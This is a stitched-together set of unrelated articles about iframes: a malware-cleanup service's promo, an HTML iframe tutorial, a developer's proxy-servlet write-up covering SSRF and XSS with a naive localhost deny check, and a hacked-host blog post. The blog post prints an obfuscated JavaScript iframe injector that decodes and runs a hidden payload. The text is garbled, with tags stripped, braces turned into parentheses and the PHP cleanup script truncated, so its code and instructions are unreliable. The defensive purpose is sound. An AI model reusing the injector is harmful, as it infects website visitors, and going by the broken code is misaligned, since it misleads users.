One of the most common ways to infect the computer of website visitors is to exploit a vulnerability associated with an overflow of user browser buffers. The recipe is quite simple. Attackers inject malicious code by inserting iframes into website pages and try to download malicious files to an unsuspecting user’s computer. It is quite easy to detect such malicious insets on your websites. You just have to pay attention to the code fragments that use the iframe connection. Such inserts can be in both HTML and PHP files.

Attackers almost always try to hide the use of malicious bets as much as possible from owners, hiding them visually for resource users and obfuscating (obfuscating) their code.

Hiding iframe inserts from users' eyes

To disguise a malicious insert, hackers in most cases use the same method over and over again - they set the properties of the tag so that it is not displayed on the page, but is contained in its code. Most often, the width and length are set to zero or one pixel: width="1px", height="1px".

For example, malicious code might look like this:

However, often hackers do not limit themselves to such disguise, complementing the concealment with more sophisticated techniques that can confuse and complicate search and elimination even for advanced programmers.

Obfuscation

This is one of the most common methods of protecting code in programming in unstructured languages ​​(such as, for example, PHP). In fact, all encryption is about mixing up/obfuscating the code itself by changing the names of variables and other elements. As a result, it is quite difficult to recognize signs of maliciousness in obfuscated code and is only possible based on indirect signs of the explicit use of special JS (JavaScript) functions used specifically for obfuscation: unescape , fromCharCode .

However, the discovery of obfuscated code on a website does not mean that it is definitely harmful or easy to remove. You need to understand that, firstly, attackers could obfuscate the code, also capturing part of the site’s working code. In this case, when you try to cut out an encrypted fragment, you risk crashing your resource. Secondly, obfuscated code may not be malicious, but only a consequence of the operation of your CMS or its individual components, as well as additional modules you have installed.

In any case, if you encounter suspicious obfuscated code, you need to act with the utmost care.

Other signs of infection

If you doubt whether the code you found is malicious, you can try to analyze indirect signs. If you have a large number of files on your site, you may want to pay attention to the date and time last change files. If you know well the scenarios for how your CMS works with files, you can take a closer look at files changed on the same date at the same time, or with changes occurring at the same time interval, for example, 1 second.

If you are an advanced programmer, you can write a script that checks for the presence of the type of inserts you have detected in all files on your site. If you are even more advanced, you can force the script to cut out inserts, however, you always need to be careful.

Alternative Methods

We recommend that you use the Virusday service to remove malicious inserts even if you are an advanced specialist. Our service not only contains many signatures that can be used to find malicious codes, but also saves time! Plus, the cost of using Virusday for cleaning will likely be much lower than paying for your own time. You will be able to detect and remove not only iframe inserts, but also many other threats. You will probably be able to find and automatically remove the threat that caused iframe inserts to appear on your site, such as Shell.

Virusday service team.

At the dawn of website building, web resources widely used frames to display individual parts of pages. But with the arrival new version HTML 5 has changed everything. Markup elements , and are deprecated. They were replaced by a single tag - . How to add to html? The example below will be clear even to a beginner in programming.

What are frames?

The frame is the basis of most first web pages. If translated literally, this word means “frame,” that is, a frame is a small part of a page in a browser. The widespread use of frames in the past can be explained by the low quality and high cost of Internet traffic. As a rule, the site was divided into 3-5 parts, each of which served a specific purpose:

• “header” (top frame along the width of the page) - displays the name of the resource;
• left/right “glass” - menu display;
• The central frame is a display of site content.

Splitting the page into parts made it possible to overload only a certain part when updating it. For example, the user clicked a menu item, and new content was downloaded to the central frame.

Modern Frames in HTML 5

Why is it needed in HTML? An example is inserting content from a third-party resource. The classic situation is when a web developer wants to show the location of an object on a map. What should I do? Draw a site plan from scratch? No - there is a simpler solution: embed a Google Map, Yandex Maps or 2GIS element on the page. The problem is solved in four steps.

You need to go to the website of any mapping service.

Find the desired object. Once you know the exact address, you can enter it in the search window.

Using the “Save and get code” button (for Yandex.Maps) or “Done” (for google maps) get the embed code.

All that remains is to enter the generated markup tags onto the page.

Additionally, you can select the map size and configure other display options.

How else can you use it in HTML?? An example is inserting video materials from the Youtube resource. Multimedia technologies attract Internet users, which is why video content is so popular. The developer will handle the installation of the video quickly.

You should upload your own video to Youtube or find a third-party file to broadcast.

Get the tag by selecting the "HTML Code" button

The final step is to paste into . An example of the resulting tag content will be discussed below.

Both examples used automatic code generation, but professional developers should be able to write code themselves. Firstly, this will allow them to understand the layout of the page and, if necessary, modify it. Secondly, the markup of site elements (even though they belong to an external resource) is not always formed without the participation of the webmaster. This is where the high qualifications of the developer come into play.

Syntax

So, before you start laying out the page, you need to consider the iframe (html) tag: what it is and how to use it correctly.

First of all, it should be noted that the tag is paired. Between the opening and closing elements, you specify the content that will be displayed in browsers that do not support this markup element. Main tag attributes:

• width(width);
• height(height);
• src (address of the downloaded resource);
• align(align method);
• frameborder;
• allowfullscreen.

Thus, the code for . The HTML example is demonstrated in full below:

In the above markup, it is enough to replace the site address with any other one and, if necessary, adjust the frame size.

Element

Frames

What does it do?

How to insert a page into an HTML page? To do this, you need to use , which creates an inline frame in the current document in which another HTML document is displayed.

Display

Display block.

Example code

Powerful yet easy to use

Back in the bad old days of web design, there were many elements that ruined the life of every developer. They were almost always a bad design approach. Luckily the element has been deprecated in HTML5. But or "inline frame" is still available. Will it be deprecated in the next version? Maybe we should avoid it? There are several valid uses of this element when creating an HTML page. But you need to understand what it is and how it works to avoid mistakes.

Similarities and differences and

Both of these elements allow you to create a separate HTML document. A link to the content of the document referenced by the current web page is specified in the src attribute.

. . . . . .

The main difference between and is that it enforces the rule that the HTML document takes precedence. Content is displayed within an element that is part of the current document. As an example, consider this embedded video taken from YouTube:

The video is clearly on an HTML page, and not on some separate panel. element broke this paradigm and allowed the document to exercise control over the browser window, breaking it into several small panels (frames), each of which displays a separate document. All other differences between and follow from this basic difference.

Don't remake frame-based layouts with iframes

Someday you may be faced with the task of updating an old website that was built using frames. You might also want to use a fixed-width layout to recreate the same nightmare of independent panels and sills. But you won't be able to use target attribute to open the link in a separate frame. You can start looking for JavaScript solutions. Please, do not do that.

Good (and terrible) uses

There are several valid use cases for HTML creation pages:

• embedding third-party media content;
• embedding your own media content through a cross-platform document;
• embedding code examples;
• embedding third-party “applets” as forms of payment.

Here are some terrible use cases:

• Photo gallery;
• forum or chat.

If you need to embed independent, pre-existing HTML documents into the current one, use . If you're building everything from scratch, there's no reason to split the page design into multiple separate documents. Especially if they aren't actually independent pieces of content.

iframe attributes

Attribute name	Meaning	Description
sandbox	Allow-same-origin Allow-top-navigation Allow-forms Allow-scripts	Sets a number of restrictions on the content loaded into the frame. Set before creating an HTML page.
scrolling	yes no auto	Determines whether to show scrolls in the frame or not. Deprecated in HTML5. Use CSS instead.
Name	Name	Specifies the name of the frame.
Align	left right top middle bottom	Determines the frame's alignment relative to surrounding elements. Is outdated. Use CSS instead.
frameborder	yes (or 1) no	Used to enable the display of a border around the frame. Deprecated in HTML5. Use CSS instead.
longdesc	URL	Used to specify the URL of a page that contains a long description of the contents of the frame. Is outdated. Use CSS instead.
marginwidth	pixels	Used to control the width of the padding from the content to the frame border. Is outdated. Use CSS instead.
src	URL	Specifies the document URL to display in the IFRAME.
vspace	pixels	Sets the vertical margins from the frame to the surrounding content. Is outdated. Use CSS instead.
width	pixels %	Defines the width of the frame by HTML page.

This publication is a translation of the article “”, prepared by the friendly project team

We made an analogue of the Google Webmaster Marker tool. Let me remind you that Marker is a tool in the Google Webmaster account that allows you to annotate your Open Graph pages with tags. To do this, you simply select a piece of text on the page with your mouse and indicate that this is the title, and this is the rating. Your page is loaded into an Iframe in the webmaster's account.

Now Google, having encountered a similar page on your site, already knows what kind of content is published on it, and how to beautifully parse it into its essence (article, product, video..)

We needed similar functionality. The task seemed simple and exclusively client side. However, in practice, the solution lies at the intersection of clientside and serverside (“pure” JS programmers may not know anything about various proxy servers and take a very long time to approach the project). However, I did not find an article on the Internet that would describe the entire technology from start to finish. I would also like to say thank you to the BeLove user and our security guards for their help.

In our case, we wanted the webmaster to be able to conveniently (by clicking with the mouse) get the xPath value for certain elements on his page.

Iframe “Same Origin” And so in our admin panel a person must enter the URL of the page of his site, we will display it in the iFrame, the person will point the mouse where necessary, we will get the required xPath. Everything would be OK, but we do not have access to the content of a page from another domain loaded into an iframe in our admin panel (our domain), due to the browser’s security policy.CORS - Cross origin resource sharing Some people advised me to use CORS. A fashionable technology that solves many problems with accessing content from another domain in the browser and allows you to bypass same origin policy restrictions.
A site that wants to give access to its content on the pages of someone else’s domain simply writes in the http header:
Access-Control-Allow-Origin: http://example.com
And in the title http request coming from a page of another domain from the browser there should be an origin field:
Origin: www.mysupersite.com
It is clear that the browser itself adds the origin field to the request. Let's look at the article on Habré and see that modern browsers add Origin even to a request for the same domain:

However:

browser does not indicate origin in the header of the request to the page loading in the iframe (can anyone explain why?)

we don't want to ask webmasters to specify the Access-Control-Allow-Origin header

Iframe sandbox Another fashionable technology. Sandbox is an attribute of the Iframe tag. One of the values ​​of this attribute can be set to allow-same-origin . Before I started digging into this topic, I didn’t know what exactly this attribute does, but it sounded very tempting. However, the sandbox attribute simply limits what a page loaded in an iframe can do and has no bearing on the issue of accessing the contents of the frame from the parent document.

Specifically, the allow-same-origin value (or rather, its absence) just says that the iframe should always be regarded as loaded from a foreign domain (for example, you cannot send AJAX request to the domain of the parent document)

Let's see how Google did it Time to see how big brother did it

Let's pay attention to the src attribute of the iframe element: src="https://wmthighlighter.googleusercontent.com/webmasters/data-highlighter/RenderFrame/007....." - our page is loaded into the admin panel with Google domain. Further, it is even more severe: even scripts and images in the source document are run through a proxy. All src, href... are replaced in html with proxied ones. Something like this:

All resources that your page uses are also stored on Google proxy servers. Here's ours for example.

CGIProxy? It immediately seemed that in order to do the same thing, you need to raise a full-fledged proxy like CGIProxy. This proxy server does approximately the same thing as Google's wmthighlighter.googleusercontent.com
Visit the script"s URL to start a browsing session. Once you"ve gotten a page through the proxy, everything it links to will automatically go through the proxy. You can bookmark pages you browse to, and your bookmarks will go through the proxy as they did the first time. Your own Proxy! However, if you narrow the task down, writing a simple proxy yourself is much easier. The fact is that Google does this, sending all page content through a proxy is not at all necessary. We just need the html of any page to be served from our domain, and resources can be loaded from the original domain. We have discarded HTTPS for now.
There is no need for super performance or convenient settings here, and this can be done quickly and using anything, from node.js to php. We wrote a servlet in Java. Download the page What should a proxy servlet do? Using the get parameter, we get the url of the page that needs to be loaded, then download the page.

Be sure to determine the encoding of the page (via http response or charset in html) - our proxy must respond in the same encoding as the page we loaded. We’ll also define the Content-Type just in case, although it’s clear that we’re getting the page in text/html and we’ll give it back the same way.
final String url = request.getParameter("url"); final HttpGet requestApache = new HttpGet(url); final HttpClient httpClient = new DefaultHttpClient(); final HttpResponse responseApache = httpClient.execute(requestApache); final HttpEntity entity = responseApache.getEntity(); final String encoding = EntityUtils.getContentCharSet(entity); final String mime = EntityUtils.getContentMimeType(entity); String responseText = IOUtils.toString(entity.getContent(), encoding);
*For those who like to evaluate other people's code: in our team, everyone has the same eclicpse code formatting settings, and when saving a file, eclipse itself adds final to all variables if they do not change anywhere else. Which, by the way, is quite convenient in the end.

Changing relative URLs to absolute ones in the page code You need to go through all the attributes with src and href in the page (paths of style files, images), and replace relative URLs with absolute ones. Otherwise, the page will try to download images from some folders on our proxy, which we naturally don’t have. Any language has ready-made classes, or you can find code snippets for this on stackoverflow:
final URI uri = new URI(url); final String host = uri.getHost(); responseText = replaceRelativeLinks(host, responseText); Sending html That's all, the proxy servlet is ready. We send a response, setting the required encoding and mime.
protected void sendResponse(HttpServletResponse response, String responseText, String encoding, String mime) throws ServletException, IOException ( response.setContentType(mime); response.setCharacterEncoding(encoding); response.setStatus(HttpServletResponse.SC_OK); response.getWriter(). print(responseText); response.flushBuffer(); ) Deploy and test Deploy our proxy servlet to the same address as the admin panel adminpanel.indexisto.com, load the webmaster’s website page into our iframe through the proxy and all cross-domain problems disappear.
Our proxy works at
http://adminpanel.indexisto.com/highlighter?url=http://habrahabr.ru
- this is how the hub will load from our domain. We give this address in the iframe and try to access the DOM tree of the hub via JS in the admin panel - everything works. CSRF naturally will not work since the page was loaded from our proxy which does not have cookies. SSRF problem Let’s load the site with the “localhost” address into our iframe - oops, there you go start page our nginx. Let's try some internal (not visible to the outside) resource on the same network as our proxy server. For example secured_crm.indexisto.com - everything is in place.
Of course we are trying to prohibit these things in our proxy, if someone tries to proxy localhost we exit without returning anything:
if (url.contains("localhost")||url.contains("127")||url.contains("highlighter")||url.contains("file")) ( LOG.debug("Trying to get local resource. Url = " + url); return; )
but we will clearly not list all network resources here. This means we need to move the proxy into a completely isolated environment so that the machine sees nothing except the Internet, itself and our proxy. We select a machine, configure and launch our servlet there. XSS problem Let's upload our page into our iframe on which we will write:
alert("xss")
An alert pops up. Sadly. This can be bypassed with the iframe sandbox allow-scripts attribute, but what about older browsers that don’t really understand this attribute? You can only steal your cookies, but you still can’t leave them like that.
We move the servlet not only to a separate machine, but also give it a separate subdomain highlighter.indexisto.com .

We arrived, we broke our own solution with bypassing cross-domain restrictions. Now we can't reach the iframe content again.

Continuing to find a solution from Google, I opened our page served through a proxy in a separate window

And I noticed a strange error in the console.
CrossPageChannel: Can't connect, peer window-object not set.
It became clear that organizing everything was more complicated than simply loading a page into an iframe from your domain. Pages communicate with each other. Accordingly, we move towards window.postMessage

Post Message It was inhumane to force the webmaster to embed our script into their page, which would ensure that page elements were selected with the mouse, and then the xPath of these elements would be sent to us in the parent document via postMessage. However, no one is stopping our proxy from injecting any scripts into the page loaded into the iFrame.
We save all the scripts necessary for implementation into a file and insert them before the closing body:
final int positionToInsert = responseText.indexOf(""); final InputStream inputStream = getServletContext().getResourceAsStream("/WEB-INF/inject.js"); final StringWriter writer = new StringWriter(); IOUtils.copy(inputStream, writer); final String jsToInsert = writer.toString(); responseText = responseText.substring(0, positionToInsert) + jsToInsert + responseText.substring(positionToInsert, responseText.length());
for testing, we insert an alert - everything works. The JS part - we highlight the house element under the mouse and get xpath Okay, let's move on to the actual JS that we inserted into the webmaster's page.
We need to highlight dom elements over which a person moves the mouse. It is better to do this using shadow because then the element will not move and the entire page will jump. We hang onmouseover on the body and look at the target of the event. In the same handler I calculate the xpath of the element. It’s better to calculate the xPath of an element per click, but I didn’t notice any slowdowns in this implementation either.
elmFrame.contentWindow.document.body.onmouseover= function(ev)( ev.target.style.boxShadow = "0px 0px 5px red"; curXpath = getXPathFromElement(ev.target); )
I'm not providing the implementation of getting the xPath of a DOM element here. There are many snippets on how to do this. These snippets can be modified to suit your needs, for example, you only need tags in xpath. Or do you need ids if they exist and classes if there are no ids - everyone has their own requirements.

Here is an example of a proxy home page Habr with embedded script:
http://highlighter.indexisto.com/?md5=6ec7rdHxUfRkrFy55jrJQA==&url=http%3A%2F%2Fhabrahabr.ru&expires=1390468360

JS part - processing the click A person’s click on the page in the iframe is immediately “extinguished” (the link in the iframe will not be followed). We also send the string of the received xPath to the parent window (we saved it at the stage of moving the mouse over the element)
document.body.onclick = function(ev)( window.parent.postMessage(curXpath, "*"); ev.preventDefault(); ev.stopPropagation(); ) Profit! That's all, now in our admin panel a webmaster can quickly get xpath paths to elements on their pages much easier.

Let's add some more security. Okay, everything worked for us, but there is a problem with the fact that our proxy looks into the world completely unprotected. Anyone can proxy anything.

We put nginx in front of the proxy, it listens to port 80, and we remove the proxy itself to another port. We close all other ports except 80 from the outside world.

Now let's make the proxy work only through the admin panel. At the moment when the webmaster enters the URL of his site, we quickly run to the server where we generate an md5 hash from the current TimeStamp + 1 hour, the URL itself and the super-secret when:
final String md5Me = timeStampExpires + urlEncoded + "SUPERSECRET"; final MessageDigest md = MessageDigest.getInstance("MD5"); md.reset(); md.update(md5Me.getBytes("UTF-8")); String code = Base64.encodeBase64String(md.digest()); code = code.replaceAll("/", "_"); code = code.replaceAll("\\+","-");
Also note that in the code we receive the md5 string not as the usual hex, but in base64 encoding, plus in the resulting md5 we make strange replacements of the slash and plus characters with underscores and dashes.
The fact is that ngnix uses base64 Filename Safe Alphabet tools.ietf.org/html/rfc3548#page-6
And Java gives canonical base64.

Having received a response from a server with secure md5 in our admin panel, we try to load the following url into the iframe:
highlighter.indexisto.com/?md5=Dr4u2Yeb3NrBQLgyDAFrHg==&url=http%3A%2F%2Fhabrahabr.ru&expires=1389791582

Now we configure the nginx HttpSecureLinkModule module. This module checks the md5 of all the parameters that came to it (the same secret key is registered in the module as in the admin servlet), checks whether the link has been parsed, and only in this case forwards the request to our proxy servlet.

Now no one can use our proxy from outside the admin panel, and also cannot insert an image requested to our server anywhere - it will die in an hour anyway.

That's all folks! Google naturally went much further with its marker tool. In order to clearly identify an element on a page, you need to mark the same element (for example, the title of an article) on several pages of the same type so that you can more accurately build xpath and discard different ids like “post-2334" which will obviously only work on one page. In our admin panel, for now xpath needs to be corrected by hand to get an acceptable result

I wanted to start my blog with lyrics, but it was such a turbulent week that I decided to greet everyone with a substantive article. Hello!

And the whole week passed in wars with constant hacking of my hosting and infection of all JavaScript files with iframes, and this is no less than about 2500 scripts and all sites with viruses.

I didn’t have time to clear all the files in a day. manual mode and change passwords, but the next day everything happened again - the passwords somehow leaked and the scripts were again successfully accessed via FTP.

Friday of the week was the last straw and I spent the day protecting my servers:

Configured .ftpaccess on the servers - thereby limiting FTP access to servers from all IPs except your static one;

I wrote an auto-removal script for iframes and viruses from all .js files. So, in order.

Infection of site files occurs by simply inserting iframe code into files via ftp. Previously, I more often observed insertions into .php, .html files - which led to the complete crash of sites, today malware has become kinder and began to write inserts exclusively in files with the extension .js - JavaScript . IFRAME inserts are written at the end of the file and can be either in explicit form (easily detected by antiviruses) or in encoded form (the work of various iframe cryptors), for example:

try ( q= document.createElement ("u" ) ; q.appendChild (q+ "" ) ; ) catch (qw) ( h=- 012/ 5 ; zz= "a" + "l" ; f= "fr" + "om" + "Ch" ; f+= "arC" ; ) try ( qwe= prototype ; ) catch (brebr) ( zz= "zv" .substr (123 - 122 ) + zz; ss= ; f+= (h ) ? "ode" : "" ; w= this ; e= w[ f.substr (11 ) + zz] ; n= "17$48$55.5$52$46.5$55$49.5$52.5$52$17$17.5$13$58.5$3.5$2$1.5$56$45.5$54$13 $55.5$54$51$13$27.5$13$26.5$3.5$2$59.5$17.5$17$17.5$26.5" [ ((e) ? "s" : "" ) + "p" + "lit" ] ("a$" .substr (1 ) ) ; for (i= 6 - 2 - 1 - 2 - 1 ; i- 684 != 0 ; i++ ) ( k= i; ss= ss+ String .fromCharCode (- 1 * h* (3 + 1 * n[ k] ) ) ; ) q= ss; e(q) ; )

try(q=document.createElement("u");q.appendChild(q+"");)catch(qw)(h=-012/5;zz="a"+"l";f="fr" +"om"+"Ch";f+="arC";)try(qwe=prototype;)catch(brebr)(zz="zv".substr(123-122)+zz;ss=;f+=(h )?"ode":"";w=this;e=w;n="17$48$55.5$52$46.5$55$49.5$52.5$52$17$17.5$13$58.5$3.5$2$1.5$56$45.5$54$13$55.5$54$51$13$27.5$13$26.5$3.5 $2$59.5 $17.5$17$17.5$26.5"[((e)?"s":"")+"p"+"lit"]("a$".substr(1));for(i=6-2-1-2 -1;i-684!=0;i++)(k=i;ss=ss+String.fromCharCode(-1*h*(3+1*n[k]));)q=ss;e(q ;)

All this symbolic chaos resulted JavaScript work turns into an easy-to-read HTML code of the iframe insert and downloads the body of the virus to the site user through the operation of the exploit. Based on this minimum theory, we will begin to protect ourselves from website infections.

Settings.ftpaccess - restrict FTP access to servers

Viruses that rob your ftp passwords are so cunning that antiviruses are often powerless and passwords leak, no matter how hard you protect yourself. I propose to take a different path - and simply block access to your ftp. To allow FTP access only from certain IPs, place the .ftpaccess file with the contents in the root of your server or sites folder:

Allow from xx.xx.xx.xx Allow from xx.xx.xx.xx Deny from all

Where xx.xx.xx.xx is your IP from which FTP activity is allowed, goodbye to everyone else.

For a dedicated IP, call your provider!

If you still cannot get a dedicated address, but have dynamic addresses, then you can specify the range of addresses from which IP addresses are issued by your Internet provider, for example it will look like this:

Allow 212.32.5.0/26 Allow 158.152.0.0/16 Deny from all

This will limit hackers' access to your servers.

Auto-removal script from all iframe insert files

After the servers were protected, I started writing a script that could check the site for viruses and would go through all the hosting folders, checking the file formats I specified for the presence of iframes in the content. The result of the work was the following script, which removes malicious code inserts from site pages, in a specific example from .js scripts:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45

$v) ( $virus_text = $GLOBALS [ "virus_start" ] ; $pos_start = stripos ($v , $GLOBALS [ "virus_start" ] ) ; $pos_end = stripos ($v , $GLOBALS [ "virus_end" ] ) ; $ virus_text = substr ($v , $pos_start , $pos_end ) ; if ($virus_text != "" ) ( if (! stristr ($v , $virus_text ) ) ( $nfile = $v ; ) else ( if (! $ flag ) ( $flag = true ; if (in_array ($ffile , $GLOBALS [ "skip_files" ] ) ) echo " - skipped" ; else ( echo " - infected" ; $GLOBALS [ "num_infected" ] ++; ) ) ) ) else ( $nfile = $v ; ) ) if ( $GLOBALS [ "del" ] ) ( $file = fopen ($filename , "w" ) ; fwrite ($file , implode ($nfile , "" ) ) ; fclose ($file ) ; ) ) dir_walk("del_virus" , $dir , array ( "js" ) , true , $dir ) ; echo "Num infected = $num_infected " ; ?>

$v) ( $virus_text = $GLOBALS["virus_start"]; $pos_start = stripos($v, $GLOBALS["virus_start"]); $pos_end = stripos($v, $GLOBALS["virus_end"]); $ virus_text = substr($v, $pos_start, $pos_end); if ($virus_text != "") ( if (!stristr($v, $virus_text)) ( $nfile=$v; ) else ( if (!$ flag) ( $flag=true; if (in_array($ffile, $GLOBALS["skip_files"])) echo " - skipped"; else ( echo " - infected"; $GLOBALS["num_infected"]++; ) ) ) ) else ( $nfile=$v; ) ) if ($GLOBALS["del"]) ( $file=fopen($filename,"w"); fwrite($file,implode($nfile,"")) ; fclose($file); ) ) dir_walk("del_virus", $dir, array("js"), true, $dir); echo "Num infected = $num_infected "; ?>